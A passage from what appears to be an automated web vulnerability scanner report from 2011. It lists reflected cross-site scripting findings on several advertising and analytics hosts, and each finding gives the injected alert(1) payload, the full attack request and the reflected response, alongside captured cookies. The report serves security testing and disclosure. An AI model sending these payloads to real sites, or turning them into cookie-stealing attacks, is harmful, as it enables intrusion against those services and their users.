bh="b!!!#L!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!
#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!#=3r#'!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; vuday1=%)0sI!!w[/N0FYbn[@`@; pv1="b!!!!(!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~"; BX=ei08qcd75vc4d&b=3&s=8s&t=246; lifb=GX*)@lPy7G0EA2)A9.-B!6-Nb'W00AM5JknRO1[uD%T4O

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:36 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Wed, 07 Sep 2011 14:16:36 GMT
Pragma: no-cache
Content-Length: 4886
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.yieldmanager.com/imp?66ccc"-alert(1)-"1cf28eb4781=1&Z=728x90&cb=1315404889357362&S=14494094&i=334050&ycg=&ypos=N&yprop=au%5fnews&yrc=&yyob=&_salt=1254241580";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex
...[SNIP]...

2.11. http://adnxs.revsci.net/imp [Z parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f2cb'-alert(1)-'936fd5c05b5 was submitted in the Z parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x906f2cb'-alert(1)-'936fd5c05b5&s=814544&r=0&_salt=1883775268&u=http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933%26keyword%3Dwa%2Fnews_home HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 08-Sep-2011 14:15:40 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 07 Sep 2011 14:15:40 GMT
Content-Length: 766

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x906f2cb'-alert(1)-'936fd5c05b5&referrer=http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html%3Fcb=0.5778487676288933%26keyword=wa/news_home&inv_code=814544&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%2
...[SNIP]...

2.12. http://adnxs.revsci.net/imp [s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adnxs.revsci.net
Path:   /imp

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4bc4'-alert(1)-'9458e980064 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imp?Z=728x90&s=814544d4bc4'-alert(1)-'9458e980064&r=0&_salt=1883775268&u=http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-2.html%3Fcb%3D0.5778487676288933%26keyword%3Dwa%2Fnews_home HTTP/1.1
Host: adnxs.revsci.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 08-Sep-2011 14:15:57 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 07 Sep 2011 14:15:57 GMT
Content-Length: 766

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=514&size=728x90&referrer=http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html%3Fcb=0.5778487676288933%26keyword=wa/news_home&inv_code=814544d4bc4'-alert(1)-'9458e980064&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D814544d4bc4%27-alert%281%29-%279458e980064%26r%3D0%26_salt%3D1883775268%26u%3Dhttp%253A%2
...[SNIP]...

2.13. http://ads.adbrite.com/adserver/vdi/830697 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/830697

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1f582<script>alert(1)</script>f76e5daf269 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/8306971f582<script>alert(1)</script>f76e5daf269?r=http%3A%2F%2Fi.w55c.net%2Fm.gif%3Fid%3D8bb138bc0446417c9a4df9a0136d0caf8a93328592bf4d059bfc856c256fbc33%26ei%3DADBRITE%26cver%3D1%26euid%3D&d=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/cms-2-frame.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; rb=0:742697:20828160:2925993182975414771:0; rb2=CiMKBjc0MjY5Nxie3fO1NCITMjkyNTk5MzE4Mjk3NTQxNDc3MRAB; untarget=1

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Wed, 07 Sep 2011 14:17:35 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/8306971f582<script>alert(1)</script>f76e5daf269

2.14. http://ads.adbrite.com/adserver/vdi/830697 [r parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/830697

Issue detail

The value of the r request parameter is copied into the HTML document as plain text between tags. The payload b909d<script>alert(1)</script>f313b2d04d0 was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /adserver/vdi/830697?r=b909d<script>alert(1)</script>f313b2d04d0&d=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/cms-2-frame.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; rb=0:742697:20828160:2925993182975414771:0; rb2=CiMKBjc0MjY5Nxie3fO1NCITMjkyNTk5MzE4Mjk3NTQxNDc3MRAB; untarget=1

Response (redirected)

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Wed, 07 Sep 2011 14:16:42 GMT
Server: XPEHb/1.0
Content-Length: 123

Unsupported URL: /adserver/vdi/b909d<script>alert(1)</script>f313b2d04d0MTY4Mjk2NTMyeDAuNTExIDEzMTU0MDQ5NzR4LTE5MTU4MDA4OTk

2.15. http://adsfac.us/ag.asp [cc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload 39812<script>alert(1)</script>540457d8300 was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=39812<script>alert(1)</script>540457d8300&source=js&ord=1570906 HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESE002=fpt=0%2C310408%2C311033%2C311032%2C&pct%5Fdate=4262&pctm=3&FM32614=1&FL310408=1&FL311033=1&pctl=311032&FL311032=1&FM32670=1&FM38928=1&pctc=32670&FQ=3; UserID=983108392662652

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 293
Content-Type: text/html
Expires: Wed, 07 Sep 2011 14:22:10 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FS39812%3Cscript%3Ealert%281%29%3C%2Fscript%3E540457d83000=uid=15673736; expires=Thu, 08-Sep-2011 14:23:10 GMT; domain=.adsfac.us; path=/
Set-Cookie: FS39812%3Cscript%3Ealert%281%29%3C%2Fscript%3E540457d8300=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4267&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Fri, 07-Oct-2011 14:23:10 GMT; domain=.adsfac.us; path=/
Set-Cookie: UserID=983108392662652773039f479290ed7f5e6371f; expires=Fri, 07-Oct-2011 14:23:10 GMT; domain=.adsfac.us; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Wed, 07 Sep 2011 14:23:10 GMT
Connection: close

if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://adsfac.us/link.asp?cc=39812<script>alert(1)</script>540457d8300.0.0&CreativeID=1';}document.write('<a href="'+fd_clk+'&CreativeID=1" target="_blank">
...[SNIP]...

2.16. http://api-public.addthis.com/url/shares.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-public.addthis.com
Path:   /url/shares.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 4230a<script>alert(1)</script>8e1156657a0 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url/shares.json?url=http%3A%2F%2Fwww.abc.net.au%2Fnews%2F2011-09-07%2Fchristmas-island-inquest-reopens%2F2875554%2F%3Fsite%3Dperth%26section%3Dnews&callback=_ate.cbs.sc_httpwwwabcnetaunews20110907christmasislandinquestreopens2875554siteperth26sectionnews104230a<script>alert(1)</script>8e1156657a0 HTTP/1.1
Host: api-public.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/news/2011-09-07/christmas-island-inquest-reopens/2875554/?site=perth&section=news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,99|36

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=600
Content-Type: application/javascript;charset=UTF-8
Date: Wed, 07 Sep 2011 14:21:17 GMT
Content-Length: 155
Connection: close

_ate.cbs.sc_httpwwwabcnetaunews20110907christmasislandinquestreopens2875554siteperth26sectionnews104230a<script>alert(1)</script>8e1156657a0({"shares":0});

2.17. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 9f02c<script>alert(1)</script>2f397727029 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=89f02c<script>alert(1)</script>2f397727029&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 21 Sep 2011 14:14:19 GMT
Date: Wed, 07 Sep 2011 14:14:19 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"89f02c<script>alert(1)</script>2f397727029", c2:"6864322", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.18. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload f6e67<script>alert(1)</script>afb97656188 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=f6e67<script>alert(1)</script>afb97656188&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 21 Sep 2011 14:14:20 GMT
Date: Wed, 07 Sep 2011 14:14:20 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
e;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"", c6:"", c10:"f6e67<script>alert(1)</script>afb97656188", c15:"", c16:"", r:""});



2.19. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 71f41<script>alert(1)</script>bff8cc07395 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15=71f41<script>alert(1)</script>bff8cc07395 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 21 Sep 2011 14:14:20 GMT
Date: Wed, 07 Sep 2011 14:14:20 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"71f41<script>alert(1)</script>bff8cc07395", c16:"", r:""});



2.20. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload c84f7<script>alert(1)</script>7046597ac2c was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322c84f7<script>alert(1)</script>7046597ac2c&c3=&c4=&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 21 Sep 2011 14:14:19 GMT
Date: Wed, 07 Sep 2011 14:14:19 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322c84f7<script>alert(1)</script>7046597ac2c", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



2.21. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload a046a<script>alert(1)</script>d230dd3e0c7 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=a046a<script>alert(1)</script>d230dd3e0c7&c4=&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=83&output=html&tpUrl=http://r1-ads.ace.advertising.com/click/site=0000801647/mnum=0000905406/cstr=35058392=_4e677c35,2342476011,801647^905406^1184^0,1_/xsxdata=$xsxdata/bnum=35058392/optn=64?trg=http%3a%2f%2fwww.adblade.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 21 Sep 2011 14:14:19 GMT
Date: Wed, 07 Sep 2011 14:14:19 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


